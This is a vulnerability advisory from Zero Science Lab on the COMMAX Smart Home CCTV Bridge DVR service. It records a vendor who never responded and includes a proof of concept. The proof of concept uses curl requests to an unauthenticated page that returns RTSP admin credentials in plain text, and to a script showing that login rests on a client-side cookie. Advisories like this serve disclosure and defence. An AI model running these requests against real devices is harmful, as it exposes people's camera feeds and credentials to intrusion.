Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure
Advisory ID: ZSL-2021-5665
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information
Risk: (3/5)
Release Date: 15.08.2021
COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety.
The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text.
COMMAX Co., Ltd. - <https://www.commax.com>
N/A
GoAhead-Webs
[02.08.2021] Vulnerability discovered.
[03.08.2021] Vendor contacted.
[04.08.2021] Vendor contacted.
[05.08.2021] No response from the vendor.
[06.08.2021] Vendor contacted.
[14.08.2021] No response from the vendor.
[15.08.2021] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php>
[2] <https://www.exploit-db.com/exploits/50208>
[3] <https://packetstormsecurity.com/files/163849>
[4] <https://cxsecurity.com/issue/WLB-2021080065>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/207571>
[15.08.2021] - Initial release
[23.08.2021] - Added reference [2], [3], [4] and [5]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a
Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.
Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker
to disclose RTSP credentials in plain-text.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5665
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
02.08.2021
--
$ curl http://TARGET:8086/overview.asp
</p>
<title> Infomation</title>
<script src="./jquery.min.js"></script>
<script src="./jquery.cookie.js"></script>
<script src="./login_check.js"></script>
<br/><br/>
<center>
<table>
<tr><td>
<li> [2021/08/15 09:56:46] Started <br/> </li><li> MAX USER : 32 <br/> </li><li> DVR Lists <br/>[1] rtsp://admin:s3cr3tP@[email protected]:554/Streaming/Channels/2:554 <br/>
</li></td></tr>
</table>
</center>
$ curl http://TARGET:8086/login_check.js:
var server_ip = $(location).attr('host');
var server_domain = server_ip.replace(":8086", "");
document.domain = server_domain;
var cookiesAuth = $.cookie("cookiesAuth");
if (cookiesAuth != "authok") {
parent.document.location.href = "http://" + server_domain + ":8086/home.asp";
}
</body></html>